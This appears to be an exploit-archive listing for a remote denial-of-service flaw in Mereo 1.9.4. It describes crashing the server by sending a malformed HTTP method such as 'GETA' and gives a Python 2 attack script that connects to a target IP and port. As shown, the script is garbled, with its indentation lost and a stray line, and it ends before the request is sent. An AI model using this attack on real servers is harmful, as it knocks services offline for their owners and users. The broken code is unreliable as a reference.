Mereo 1.9.4 Denial Of Service

Mereo version 1.9.4 suffers from a remote HTTP server denial of service vulnerability.

MD5 | 61835931a9f8d5b82c7478435a3bcb73

# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Date: 06-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage:
# Software Link:
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista

# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is
not supported with the application, so it will be caused to crash.
python 80
import socket
import os
import sys

if len(sys.argv) != 3:
print "Usage: python targetIP targetPort"

print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))

Related Posts